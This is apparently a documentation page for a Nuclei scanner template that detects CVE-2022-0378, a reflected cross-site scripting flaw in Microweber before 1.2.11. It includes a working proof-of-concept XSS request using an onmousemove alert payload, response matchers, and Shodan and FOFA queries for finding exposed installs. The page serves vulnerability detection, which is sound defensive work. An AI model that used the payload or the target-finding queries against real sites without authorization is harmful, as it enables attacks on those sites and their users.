Microweber Cross-Site Scripting
ID: CVE-2022-0378
Severity: medium
Author: pikpikcu
Tags: cve2022,cve,microweber,xss,huntr
Description
Section titled “Description”Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
YAML Source
Section titled “YAML Source”id: CVE-2022-0378
info: name: Microweber Cross-Site Scripting author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce - https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31 - https://github.com/vohvelikissa/bugbouncing - https://github.com/x86trace/Oneliners classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.41295 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: - http.favicon.hash:780351152 - http.html:"microweber" fofa-query: - body="microweber" - icon_hash=780351152 tags: cve2022,cve,microweber,xss,huntr
http: - method: GET path: - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
matchers-condition: and matchers: - type: word part: body words: - 'mwui_init' - 'onmousemove="alert(document.domain)' condition: and
- type: status status: - 200# digest: 4a0a004730450220080f61045b188e9f123e9741eba7dda703f9216a4c163ca625751836cc69d2560221008c532b343cbb024ff3e0c5ae32837b65f1992f2e8bf79e54b1a92b75eb228c8a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0378.yaml"